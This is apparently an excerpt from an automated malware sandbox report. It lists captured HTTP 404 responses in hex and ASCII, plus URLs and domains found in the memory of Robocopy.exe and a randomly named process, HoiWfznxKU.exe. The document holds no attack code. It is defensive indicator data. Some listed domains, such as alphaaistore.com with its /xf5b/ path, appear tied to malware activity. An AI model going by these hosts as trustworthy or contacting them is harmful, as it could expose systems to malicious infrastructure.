            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 15:31:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 27 Sep 2024 15:31:50 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-27T15:31:55.8118827Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 15:31:57 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 15:31:59 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 15:32:02 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 15:32:04 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/8934/rcomlogo.jpg
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Alphaaistore.com
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Martaschrimpf.info
            Source: HoiWfznxKU.exe, 00000006.00000002.3987877558.0000000004E9E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com/Alpha.cfm?fp=ptQ1PhmefSIPL%2BuLjwFIjR1UQknnb2Bgv3CJh%2BHmStYCNq%2BtSB73n
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com/Christian_Private_Schools.cfm?fp=ptQ1PhmefSIPL%2BuLjwFIjR1UQknnb2Bgv3CJh
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com/Christian_Website.cfm?fp=ptQ1PhmefSIPL%2BuLjwFIjR1UQknnb2Bgv3CJh%2BHmStY
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com/Church_Video.cfm?fp=ptQ1PhmefSIPL%2BuLjwFIjR1UQknnb2Bgv3CJh%2BHmStYCNq%2
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com/The_Christian_Faith.cfm?fp=ptQ1PhmefSIPL%2BuLjwFIjR1UQknnb2Bgv3CJh%2BHmS
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com/__media__/js/trademark.php?d=alphaaistore.com&type=dflt
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com/display.cfm
            Source: HoiWfznxKU.exe, 00000006.00000002.3987877558.0000000004E9E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.alphaaistore.com/xf5b/
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.martaschrimpf.info/Buy_Music_Online.cfm?fp=pO0JpCU5Mh6f5g1arwsF3FAaMtZCoz%2F4No65eqcRoFM4
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.martaschrimpf.info/Matt_Schrimpf.cfm?fp=pO0JpCU5Mh6f5g1arwsF3FAaMtZCoz%2F4No65eqcRoFM4S68
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.martaschrimpf.info/Music_Production_Schools.cfm?fp=pO0JpCU5Mh6f5g1arwsF3FAaMtZCoz%2F4No65
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.martaschrimpf.info/Music_Video_Production.cfm?fp=pO0JpCU5Mh6f5g1arwsF3FAaMtZCoz%2F4No65eq
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.martaschrimpf.info/Schrimpf.cfm?fp=pO0JpCU5Mh6f5g1arwsF3FAaMtZCoz%2F4No65eqcRoFM4S6840KTg
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.martaschrimpf.info/__media__/design/underconstructionnotice.php?d=martaschrimpf.info
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.martaschrimpf.info/__media__/js/trademark.php?d=martaschrimpf.info&type=ns
            Source: Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.martaschrimpf.info/display.cfm
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.register.com/?trkID=WSTm3u15CW
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.register.com?trkID=WSTm3u15CW
            Source: Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
